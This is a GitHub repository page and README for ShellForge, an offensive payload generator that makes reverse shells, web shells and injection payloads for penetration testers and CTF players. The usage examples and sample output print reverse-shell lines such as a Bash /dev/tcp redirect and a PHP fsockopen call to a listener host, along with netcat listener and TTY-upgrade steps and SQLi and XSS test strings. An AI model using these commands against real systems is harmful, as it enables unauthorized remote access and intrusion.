Skip to content

DavidJara1998/ShellForge

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
modules
modules
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 
shellforge.py
shellforge.py
 
 

Repository files navigation

ShellForge

Offensive payload generation toolkit for penetration testers and security researchers.

ShellForge is a modular CLI tool for generating reverse shells, web shells, and injection payloads (XSS, SQLi, CMDi, LFI) with multiple encoding variants. Built for CTF players, bug bounty hunters, and pentesters.

Features

Module Description
Reverse Shells 20+ templates: Bash, Python, PHP, Perl, Ruby, PowerShell, Netcat, Java, Go, AWK, Lua, Socat
Web Shells PHP (simple/full/stealth/reverse), ASPX, ASP, JSP, Python CGI
XSS Payloads 25+ payloads — basic, event handlers, filter bypass, DOM-based, exfil, template injection
SQL Injection 35+ payloads — error-based, union, blind boolean, time-based, auth bypass, NoSQL, LDAP
Command Injection 20+ payloads — Linux/Windows, out-of-band, blind
LFI / Path Traversal 25+ payloads — traversal, null byte, PHP wrappers, Windows paths
Encoder 8 encoding modes: plain, base64, URL, double URL, hex, HTML entities, Unicode, JS hex
Export Save results as JSON, HTML (dark theme), or TXT

Installation

git clone https://github.com/DavidJara1998/ShellForge.git
cd ShellForge
pip install -r requirements.txt

Usage

python shellforge.py [OPTIONS]

Reverse Shells

# List all available shell types
python shellforge.py --revshell --lhost 10.10.10.1 --lport 4444

# Generate a specific shell type
python shellforge.py --revshell --lhost 10.10.10.1 --lport 4444 --shell bash_tcp
python shellforge.py --revshell --lhost 10.10.10.1 --lport 4444 --shell python3
python shellforge.py --revshell --lhost 10.10.10.1 --lport 4444 --shell powershell_b64
python shellforge.py --revshell --lhost 10.10.10.1 --lport 4444 --shell nc_mkfifo

# Base64-encode the output
python shellforge.py --revshell --lhost 10.10.10.1 --lport 4444 --shell bash_tcp --b64

Available shell types:

Key Description
bash_tcp Bash /dev/tcp redirect
bash_udp Bash /dev/udp redirect
bash_196 Bash fd 196 trick
python3 Python 3 socket
python2 Python 2 socket
php_exec PHP exec()
php_shell_exec PHP shell_exec()
php_system PHP system()
perl Perl socket
ruby Ruby TCPSocket
nc_mkfifo Netcat + mkfifo
nc_e Netcat -e
nc_nmap Ncat -e
powershell_b64 PowerShell Base64 encoded
powershell_raw PowerShell raw TCP
java Java Runtime.exec
golang Go net.Dial
socat Socat TCP
socat_tty Socat with full TTY
awk AWK /inet/tcp
lua Lua socket

Web Shells

# List all available web shells
python shellforge.py --webshell

# Display a specific shell
python shellforge.py --webshell php_basic
python shellforge.py --webshell aspx

# Save to file
python shellforge.py --webshell php_basic --output ./shells/

# Save all shells to directory
python shellforge.py --webshell --output ./shells/

Available web shells: php_simple, php_basic, php_stealth, php_full, php_reverse, aspx, asp, jsp, python_cgi

Payloads

# List all categories
python shellforge.py --payload

# Generate XSS payloads (plain)
python shellforge.py --payload xss

# Generate SQLi payloads with URL encoding
python shellforge.py --payload sqli --encode url

# Generate LFI payloads with base64 encoding
python shellforge.py --payload lfi --encode base64

# Show all encodings for the first payload
python shellforge.py --payload xss --all-encodings

Categories: xss | sqli | cmdi | lfi

Encodings: plain | base64 | url | double_url | hex | html | unicode | js_hex

Encoder

# Encode a custom string
python shellforge.py --encode-text "<script>alert(1)</script>" --encode base64
python shellforge.py --encode-text "' OR 1=1--" --encode url

# Show all encodings at once
python shellforge.py --encode-text "test payload" --all-encodings

# Decode base64
python shellforge.py --decode-b64 "YWxlcnQoMSk="

Export Results

# Export reverse shell results as JSON
python shellforge.py --revshell --lhost 10.0.0.1 --lport 9001 --export json

# Export payloads as HTML report
python shellforge.py --payload sqli --export html

# Custom output prefix
python shellforge.py --payload xss --encode url --export txt --output xss_report

Sample Output

  ____  _          _ _ _____
 / ___|| |__   ___| | |  ___|__  _ __ __ _  ___
 \___ \| '_ \ / _ \ | | |_ / _ \| '__/ _` |/ _ \
  ___) | | | |  __/ | |  _| (_) | | | (_| |  __/
 |____/|_| |_|\___|_|_|_|  \___/|_|  \__, |\___|
                                      |___/

=== MODULE 1: REVERSE SHELL GENERATOR ===

[*] LHOST: 10.10.10.1  |  LPORT: 4444

+------------------+--------------------+-----------------------------------------------+
| Key              | Name               | Payload (truncated)                           |
+------------------+--------------------+-----------------------------------------------+
| bash_tcp         | Bash TCP           | bash -i >& /dev/tcp/10.10.10.1/4444 0>&1 ...  |
| python3          | Python 3           | python3 -c 'import socket,subprocess,...      |
| php_exec         | PHP exec           | php -r '$sock=fsockopen("10.10.10.1",4444)... |
...

Listener Setup

Always set up your listener before delivering the payload:

# Basic netcat listener
nc -lvnp 4444

# Netcat with rlwrap (arrow key support)
rlwrap nc -lvnp 4444

# Upgrade to full TTY (after getting shell)
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm

Legal Disclaimer

This tool is intended for authorized penetration testing, CTF competitions, and security research only. Always obtain written permission before testing any system. The author assumes no responsibility for unauthorized or illegal use.

License

MIT License — see LICENSE

About

Offensive payload generator: reverse shells, web shells, XSS/SQLi/CMDi/LFI payloads with encoding variants

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors 1

Languages